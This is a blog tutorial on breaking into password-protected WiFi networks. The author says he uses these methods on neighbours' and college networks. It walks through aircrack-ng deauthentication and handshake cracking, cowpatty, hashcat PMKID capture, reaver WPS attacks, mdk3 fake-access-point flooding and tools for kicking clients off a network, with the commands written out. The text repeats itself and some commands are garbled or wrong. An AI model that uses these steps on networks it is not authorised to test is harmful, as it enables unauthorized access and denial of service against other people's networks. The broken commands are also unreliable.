Hey guys, Today in this tutorial am going to teach you how to hack WiFi Password.
The Exact Process I personally use to Hack my neighbours WiFi, college's WiFi and many other password protected WiFi.
Hacking WiFi is more fun so that we can easily connect any password protected WiFi networks, but WiFi Hacking doesn't mean only knowing the WiFi password is hacking, it also covers Recovering WiFi Passwords, Kicking out someone from connecting to a network, Performing DDOS attack on a WiFi network and so on.
One more thing is when it comes to hacking there is no particular way to hack, it has many ways,
security changing day by day and we have to keep up to date with new vulnerability.
In this WiFi hacking tutorial am going to teach you how to hack wifi password on pc and how to perform some penetrating attacks against any WiFi network
Before we get started, there are some requirements so that we are going to hack WiFi with Kali Linux.
If you're a android user then make sure you read this WiFi Hacking Tutorial for Android.
In this WiFi Hacking Tutorial we are going to attack using Kali Linux, as Kali Linux comes with so many pre-installed tools If you don't yet installed then make sure you install, if you don't know how to install then follow the official Kali Linux Tutorial to install Kali Linux
Before we get started you must know about what type of WiFi Security out there, there are so many WiFi security protocols such as WPS, WPA, WPA2, WEP, WPA3.
Knowing the security protocols is important at WiFi hacking as we have to detect the type of vulnerability and taking advantage of it.
As TheHackerNews recently published a vulnerability that could allow attackers to hack WiFi, you can check out it
There are lot of ways out there, so follow the below steps carefully to hacking WiFi password
Let's Start The first type of attack using Aircrack-ng program,
So what is Aircrack-ng?
as per Wikipedia
Aircrack-ng is a powerful program written in C, which can analyze and crack WiFi passwords for WEP, WPA, WPA2.
Let's see how we can take advantage of it.
Lets Open Terminal And Type This Command
It will kill some connections don't worry,
Now type below command and make sure everything is OK
Then Enable Monitor Mode By Typing this
Then type
After You will see some networks, just stop airdump-ng by typing Ctrl+C
Now you have to type this command and note down Bssid & channel of the network which you wanna hack
After hitting enter, you will see like this
Now open a new terminal window, and type this command
Now in the other terminal window you will see handshake id
Now type this command in that terminal window
Protip
The wordlist is usually located at Computer/use/share/wordlists
Make sure the wordlist is properly located at the right path
after typing the command, it will take some time, after thafyou will get the password
So you have learnt how to hack into wifi.
Now let's see
In this senerio the attacker can intercept the traffic packets between two hosts.
Firstly open terminal and type
Without wasting your time, let's see how to use it
Firstly kill the background process as typing below command in the terminal
Now we have to capture the handshake hash file.
For that type below command
When someone connects to the Access Point then we will capture the hash
So open a new terminal window and Type this command
After capturing the handshake key.
Type ls command to see the handshake key is there, after that type
That's all you will get the password,
Feeling amazing?
Now let's see
Firstly Hashcat Tool must be installed in your Kali Machine, most of the times it comes with default if not make sure you should update and upgrade the Kali Linux packages
Still confused then visit the Official Hashcat installation document and do as follows
Now open terminal and clone hcxtools from github by typing this command
After that to the directory by typing cd hcxtools
And type make
Then type make install
Now hcxtools is installed. If you stuck anywhere make sure to check the github's Readme guide
Now go back to the main directly by typing cd
Now we have to install hcxdump tools for that open terminal and type.
Now goto the directory by typing cd hcxdumptool
And type make
Then type make install
Now go back to main directory by typing cd
Now type
airmon-ng check kill
Then start monitor mode
Now we have to type this command
Now wait until you found some PMK ID
After that stop scanning by typing Ctrl+c
And the PMK ID will be saved to the file we specified.
Now we have to convert the file accessible by Hashcat tool
For that type this command.
Now we got the PMK Hash and its time to attack with a good password list, in this attack am going to use the darkc0de word list from github
So type command
Now you have to manually check status by typing s
Am failed in this attack so quitting, it all depends on your patience so try yourself may work for you.
Now let's see
Fern WiFi Cracker is a wireless security auditing and attacking tool written in Python, this tool can crack WPA/WPA2/WEP networks and also can perform MITM attacks
To start attacking with this tool
Goto Tools Menu then goto Wifeless Attacks then choose Fern WiFi Cracker
Its interface its cool, even a 10 years kid can easily attack with this tool.
After opening the tool just select monitor mode wlan0, and start scanning for near by WiFi networks.
And select any network from the available networks, then use a good password list,
It will take some time to crack,
If successeed then you will see the password
Hope you guys known how easy it is to how to hack a wifi password.
Now let's see
Now let's see how simple it is to hack WiFi password with this tool.
Firstly open new terminal and paste below command to download Gerix Tool
Now type this command cd gerix-wifi-cracker-2 && ls
Now type python gerix.py
To start the program.
You will sees cool interface like this
In the interface section select wlan0 and click on enable monitor mode
Now click on rescan network to see the available WiFi networks
Now select the Bssid and click on WPA
Then click on General functionality then click on start sniffing
In the interface click on autoload Victim Clients and add any random deauth number
And click on client deauthentication to capture the handshake hash
Now click on cracking and select the password wordlist and start attacking
After successful cracking you will see the password
Now let's see
Firstly install wifite tool if it's not yet installed by default
Just head over to github to get the tool
In this section am going to attack WPA network with a good wordlist
So type this command
After enabling monitor mode by typing 2 then we will select the targeted network and capture handshake hash and attack with a good wordlist
After getting the handshake hash, now its time to crack the hash using a good wordlist like rock you, darkc0de or you can create your own wordlist
To crack the hash type this command
Now select the handshake hash
And select the program to crack am choosing Aircrack, you can choose any or all from the list
If the hash cracked successfuly then you will see the password and will be saved to cracked.txt file
Now let's try another tool
Airgeddon is a multi use bash script for linux for auditing wireless Networks
Now Let's See How we can Hack Wifi using this tool
Now Lets Start hacking wifi password using Aircrack and Crunch in Airgeddon Tool
Firstly Download Airgeddon tool by cloning the reprository from Github
So Open Terminal and Type
Now open the Airgeddon directory by typing cd airegeddon && ls
then type chmod +x airgeddon.sh
Now type in the terminal
and it will start installing required programs, if anything fails then make sure you install it manually
Now Select Interface Mode As Waln0
and Capture Handshake file by typing 5
and it will start searching for Nearby Wifi Networks
just type CTRL+C To Stop Scanning and select any one from it.
Now you have to capture the handshake file to attack
So type 2 and capture the handshake hash.
Now hit enter to Continue and select 6 For Offline Crack
Now select the Option Crack with Crunch Tool by typing 2
then select password length 8, and select the saved BSSID
and select the characher length etc.
Now Boom it will start Cracking the password
Now Its boaring time.
So let's start
Firstly Install Reaver Tool
like many other wifi hacking, we will enable monitor mode
so type
airmon-ng start wlan0
then type
airdump-ng wlan0mon
after getting some networks then stop the program
now type
now it will take lot of time to get the password, if you have enough patience then you can wait
Now lets see how we can do some MITM attacks by hacking wifi
we are going to kickout the connected hosts on the same network
so firstly install Netattack tool
so open Terminal and type
Inorder to work this tool, you have to upgrade your packages if not upgraded
now goto the netattack directory by typing cd netattack2 && ls
now type chmod +x netattack2.py
Now Run the program by typing
python netattack2.py
note make sure you're connected to a network, Just any select the option from there, its very simple
so lets see how we can perform dos typs fake access point attack
Now in this section we are going to trick others by creating a lot of fake SSID wifi names, so that others will be confused to choose the right network
so firstly enable monitor mode
by typing
airmon-ng start wlan0
if your adapter chipset is ready then
make a list of wifi names in a txt file and save it in your desktop
now start the attack by typing
thats all, the fake wifi Ssid will be created with the wifi names you have created
Here is a detailed tutorial on evil twin attack
Learn More about it https://github.com/OpenSecurityResearch/hostapd-wpe/
Wifresti tool is used to recover the saved wifi passwords in your system,
This tool is written in Python supports For Windows, Linux and MacOs
Now Lets See How we can see the wifi passwords strored in our system.
Firstly Install Wifresti tool
Open Terminal and type
then type
then run Wifresti by typing
sudo wifresti
Now Select your OS
Then select the Wifi Name to see its password, thats too easy
There is no magic in securing your wifi, even though will try to secure the security comes with latest vulnerabilities
However these tips may help you
Conclusion:
Hope You Learnt How to Hack WiFi password, This Tutorial meant only for educational & Pentesting purpose, I have shared the most poplar ways of hacking WiFi but there are lot of new vulnerability out so keep updated with the internet, Hacking is a life time journey of Learning.
Let me know how you feel after your first hack.
The Exact Process I personally use to Hack my neighbours WiFi, college's WiFi and many other password protected WiFi.
Hacking WiFi is more fun so that we can easily connect any password protected WiFi networks, but WiFi Hacking doesn't mean only knowing the WiFi password is hacking, it also covers Recovering WiFi Passwords, Kicking out someone from connecting to a network, Performing DDOS attack on a WiFi network and so on.
One more thing is when it comes to hacking there is no particular way to hack, it has many ways,
security changing day by day and we have to keep up to date with new vulnerability.
In this WiFi hacking tutorial am going to teach you how to hack wifi password on pc and how to perform some penetrating attacks against any WiFi network
Before we get started, there are some requirements so that we are going to hack WiFi with Kali Linux.
If you're a android user then make sure you read this WiFi Hacking Tutorial for Android.
- How To Hack Wifi Password In 2020
- Setting Up Aircrack-Ng Program For Hacking WiFi
- How Wi-Fi Password Cracked By Using Cowpatty Tool
- Wifi Password Cracking By Using Hashcat Tool
- How To Crack Wifi Password By Fern WIFI Cracker Tool
- How To Crack WIFI Password Using Gerix WiFi Cracker
- How Wifite Tool Used To Crack Wi-Fi Password
- Crack WIFI Password By Using Aircrack And Crunch In Airgeddon Tool
- Hack WPA/WPA2 WPS With Reaver
- Kickout The Connected Wi-Fi Devices Using Netattack2 Tool
- Creating Random And Custom WiFI Fake AP And WiFi DOS Attack Flooding
- Evil Twin And Access Point MAC Spoofing Using Airbase-Ng
- Hostpad-Wpe Wi-Fi Password Cracker Tool
- Recovering Your Saved Passwords From Your System Using Wifresti
- How To Secure Your Wifi
In this WiFi Hacking Tutorial we are going to attack using Kali Linux, as Kali Linux comes with so many pre-installed tools If you don't yet installed then make sure you install, if you don't know how to install then follow the official Kali Linux Tutorial to install Kali Linux
Before we get started you must know about what type of WiFi Security out there, there are so many WiFi security protocols such as WPS, WPA, WPA2, WEP, WPA3.
Knowing the security protocols is important at WiFi hacking as we have to detect the type of vulnerability and taking advantage of it.
As TheHackerNews recently published a vulnerability that could allow attackers to hack WiFi, you can check out it
How to hack wifi password in 2020
There are lot of ways out there, so follow the below steps carefully to hacking WiFi password
Let's Start The first type of attack using Aircrack-ng program,
Setting Up Aircrack-ng program for Hacking WiFi
So what is Aircrack-ng?
as per Wikipedia
Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs. It works with any wireless network interface controller whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic. - Wikipedia
Aircrack-ng is a powerful program written in C, which can analyze and crack WiFi passwords for WEP, WPA, WPA2.
Let's see how we can take advantage of it.
Crack WPA,WPA2 PSK Passwords Using Aircrack-Ng Tool
Firstly Aircrack-ng program must be installed in your Kali Machine, its preinstalled for all if not then check Aircrack-ng official Installations DocumentLets Open Terminal And Type This Command
airmon-ng check kill
It will kill some connections don't worry,
Now type below command and make sure everything is OK
airmon-ng
Then Enable Monitor Mode By Typing this
airmon-ng start wlan0
Then type
airodump-ng wlan0mon
After You will see some networks, just stop airdump-ng by typing Ctrl+C
Now you have to type this command and note down Bssid & channel of the network which you wanna hack
airodump-ng -c {channel} --bssid {bssid} -w /root/Desktop/ wlan0mon
After hitting enter, you will see like this
Now open a new terminal window, and type this command
aireplay-ng -02 -a {router bssid} -c {client bssid} wlan0mon
Now in the other terminal window you will see handshake id
Now type this command in that terminal window
aircrack-ng -a2 -b {bssid} -w {path to word list} /root/Desktop/*.cap
Protip
The wordlist is usually located at Computer/use/share/wordlists
Make sure the wordlist is properly located at the right path
after typing the command, it will take some time, after thafyou will get the password
So you have learnt how to hack into wifi.
Now let's see
How Wi-Fi Password Cracked by Using Cowpatty Tool
Before we start hacking wifi password with Cowpatty Tool, let's see an overview of it. And know how this tool helps an attackerOverview Of Cowpatty Tool
Cowpatty tool allows attackers to take advantage of WPA, WPA2 Network to do a dictionary based attack against the wireless network by breaking the Pre shared Key algorithmIn this senerio the attacker can intercept the traffic packets between two hosts.
Firstly open terminal and type
Cowpatty -hYou will see a detailed overview of the tool,
Without wasting your time, let's see how to use it
Firstly kill the background process as typing below command in the terminal
airmon-ng check killNow enable monitor mode by typing
airmon-ng start wlan0Now let's see the nearest Access Point by typing below command
airodump-ng wlan0monNow you will see some WiFi networks, to stop scanning simply type CTRL+C
Now we have to capture the handshake hash file.
For that type below command
airodump-ng --bssid {bssid} -c {client bssid} -w Cowpatty wlan0
When someone connects to the Access Point then we will capture the hash
So open a new terminal window and Type this command
aireplay-ng -0 0 -a {bssid} -c {client bssid} wlan0mon
After capturing the handshake key.
Type ls command to see the handshake key is there, after that type
cowpatty -f /usr/share/wordlists/rockyou.txt -r /root/Desktop/cowpatty-02.cap -s "WiFi Network Name here"
That's all you will get the password,
Feeling amazing?
Now let's see
Wifi Password Cracking by Using Hashcat Tool
Before we start attacking with this tool, let me tell you that it takes little bit of time to be successeed and therefore it depends on the password weakness of the Access Point. In this type of attack the vulnerability allows attackers to bruteforce the network password other than waiting a device to be connectedRequired Tools for Hashcat Attack
There are some tools required during haskcat attack, they are- Hashcat tool
- Hcxtools
- HcxDump Tool
Firstly Hashcat Tool must be installed in your Kali Machine, most of the times it comes with default if not make sure you should update and upgrade the Kali Linux packages
Still confused then visit the Official Hashcat installation document and do as follows
Now open terminal and clone hcxtools from github by typing this command
git clone https://github.com/wi-fi-analyzer/hcxtools.git
After that to the directory by typing cd hcxtools
And type make
Then type make install
Now hcxtools is installed. If you stuck anywhere make sure to check the github's Readme guide
Now go back to the main directly by typing cd
Now we have to install hcxdump tools for that open terminal and type.
git clone https://github.com/ZerBea/hcxdumptool.git
Now goto the directory by typing cd hcxdumptool
And type make
Then type make install
Now go back to main directory by typing cd
Now type
airmon-ng check kill
Then start monitor mode
airmon-ng start wlan1
Now we have to type this command
hcxdumptool -i wlan1mon -o hotspotcap.pcapng --enable status=1 -c {channel}
Now wait until you found some PMK ID
After that stop scanning by typing Ctrl+c
And the PMK ID will be saved to the file we specified.
Now we have to convert the file accessible by Hashcat tool
For that type this command.
hcxpcaptool -E essidlist -I identylist -U usernamelist -z hotspotcap.16800 hotspotcap.pcapng
Now we got the PMK Hash and its time to attack with a good password list, in this attack am going to use the darkc0de word list from github
So type command
hashcat -m 16800 -a 0 --kernel-accel=1 -w 4 --force '/root/Desktop/darkc0de.txt'
Now you have to manually check status by typing s
Am failed in this attack so quitting, it all depends on your patience so try yourself may work for you.
Now let's see
How to crack wifi Password by Fern WIFI cracker Tool
Fern WiFi Cracker is a wireless security auditing and attacking tool written in Python, this tool can crack WPA/WPA2/WEP networks and also can perform MITM attacks
Features of Fern WiFi Cracker Tool
- WEP cracking
- WPA/WPA2 Cracking Dictionary Based Attack, WPS based attack
- Automatic Access Point Attack
- MITM attacks
- Session Hijacking
- Bruteforce Attack
To start attacking with this tool
Goto Tools Menu then goto Wifeless Attacks then choose Fern WiFi Cracker
Its interface its cool, even a 10 years kid can easily attack with this tool.
After opening the tool just select monitor mode wlan0, and start scanning for near by WiFi networks.
And select any network from the available networks, then use a good password list,
It will take some time to crack,
If successeed then you will see the password
Hope you guys known how easy it is to how to hack a wifi password.
Now let's see
How To Crack WIFI Password Using Gerix WiFi Cracker
Gerix is a powerful WiFi password cracking tool written in Python.Now let's see how simple it is to hack WiFi password with this tool.
Firstly open new terminal and paste below command to download Gerix Tool
https://github.com/J4r3tt/gerix-wifi-cracker-2.git
Now type this command cd gerix-wifi-cracker-2 && ls
Now type python gerix.py
To start the program.
You will sees cool interface like this
In the interface section select wlan0 and click on enable monitor mode
Now click on rescan network to see the available WiFi networks
Now select the Bssid and click on WPA
Then click on General functionality then click on start sniffing
In the interface click on autoload Victim Clients and add any random deauth number
And click on client deauthentication to capture the handshake hash
Now click on cracking and select the password wordlist and start attacking
After successful cracking you will see the password
Now let's see
How Wifite tool used to Crack Wi-Fi Password
In this section you will learn how you can actually hack WiFi using Wifite Tool and automate attacksFirstly install wifite tool if it's not yet installed by default
Just head over to github to get the tool
In this section am going to attack WPA network with a good wordlist
So type this command
wifite --wpa
After enabling monitor mode by typing 2 then we will select the targeted network and capture handshake hash and attack with a good wordlist
After getting the handshake hash, now its time to crack the hash using a good wordlist like rock you, darkc0de or you can create your own wordlist
To crack the hash type this command
wifite --crack --dict {path of wordlist}
Now select the handshake hash
And select the program to crack am choosing Aircrack, you can choose any or all from the list
If the hash cracked successfuly then you will see the password and will be saved to cracked.txt file
Now let's try another tool
Crack WIFI Password by Using Aircrack and Crunch in Airgeddon Tool
Now Let's See How we can Hack Wifi using this tool
Features Of Airgeddon Tool
- Interface Mode Switcher
- DOS over Wireless Networks using different Method
- Assisted Handshake file capture
Now Lets Start hacking wifi password using Aircrack and Crunch in Airgeddon Tool
Firstly Download Airgeddon tool by cloning the reprository from Github
So Open Terminal and Type
git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
Now open the Airgeddon directory by typing cd airegeddon && ls
then type chmod +x airgeddon.sh
Now type in the terminal
./airgeddon.sh
and it will start installing required programs, if anything fails then make sure you install it manually
Now Select Interface Mode As Waln0
and Capture Handshake file by typing 5
and it will start searching for Nearby Wifi Networks
just type CTRL+C To Stop Scanning and select any one from it.
Now you have to capture the handshake file to attack
So type 2 and capture the handshake hash.
Now hit enter to Continue and select 6 For Offline Crack
Now select the Option Crack with Crunch Tool by typing 2
then select password length 8, and select the saved BSSID
and select the characher length etc.
Now Boom it will start Cracking the password
Now Its boaring time.
Hack WPA/WPA2 WPS With Reaver
In this section we are going to hack the wifi Password using Reaver ToolSo let's start
Firstly Install Reaver Tool
https://github.com/t6x/reaver-wps-fork-t6x
like many other wifi hacking, we will enable monitor mode
so type
airmon-ng start wlan0
then type
airdump-ng wlan0mon
after getting some networks then stop the program
now type
reaver -i wlan0mon -b {bssid} -vv
now it will take lot of time to get the password, if you have enough patience then you can wait
Now lets see how we can do some MITM attacks by hacking wifi
Kickout the Connected Wi-Fi devices Using Netattack2 Tool
Netattack is a python script that scans local and wireless networks and by using this toolwe are going to kickout the connected hosts on the same network
so firstly install Netattack tool
so open Terminal and type
git clone https://github.com/chrizator/netattack2.git
Inorder to work this tool, you have to upgrade your packages if not upgraded
now goto the netattack directory by typing cd netattack2 && ls
now type chmod +x netattack2.py
Now Run the program by typing
python netattack2.py
note make sure you're connected to a network, Just any select the option from there, its very simple
so lets see how we can perform dos typs fake access point attack
Creating Random and Custom WiFI Fake AP and WiFi DOS Attack Flooding
Now in this section we are going to trick others by creating a lot of fake SSID wifi names, so that others will be confused to choose the right network
so firstly enable monitor mode
by typing
airmon-ng start wlan0
if your adapter chipset is ready then
make a list of wifi names in a txt file and save it in your desktop
now start the attack by typing
mdk3 wlan0mon -b -c 1 -f {list of wifi names txt file}
thats all, the fake wifi Ssid will be created with the wifi names you have created
Evil twin and access point MAC spoofing using airbase-ng
Here is a detailed tutorial on evil twin attack
Hostpad-wpe Wi-Fi Password Cracker Tool
Learn More about it https://github.com/OpenSecurityResearch/hostapd-wpe/
Recovering Your Saved Passwords from your System using Wifresti
Wifresti tool is used to recover the saved wifi passwords in your system,
This tool is written in Python supports For Windows, Linux and MacOs
Now Lets See How we can see the wifi passwords strored in our system.
Firstly Install Wifresti tool
Open Terminal and type
sudo su
then type
git clone https://github.com/LionSec/wifresti.git && cp * wifresti/wifresti.py /usr/bin/wifresti && chmod +x usr/bin/wiftesti
then run Wifresti by typing
sudo wifresti
Now Select your OS
Then select the Wifi Name to see its password, thats too easy
How To Secure Your Wifi
There is no magic in securing your wifi, even though will try to secure the security comes with latest vulnerabilities
However these tips may help you
- Use A Strong Password for your SSID
- Make Use Of Firewalls, Mac Filters
- Make Use Of WPA2
- Use VPN on your Connected Devices
- Use Good Wifi Name and avoid using default names eg: D-Link, Tp-Link
- Keep Access Logs
Conclusion:
Hope You Learnt How to Hack WiFi password, This Tutorial meant only for educational & Pentesting purpose, I have shared the most poplar ways of hacking WiFi but there are lot of new vulnerability out so keep updated with the internet, Hacking is a life time journey of Learning.
Let me know how you feel after your first hack.
No comments:
Post a Comment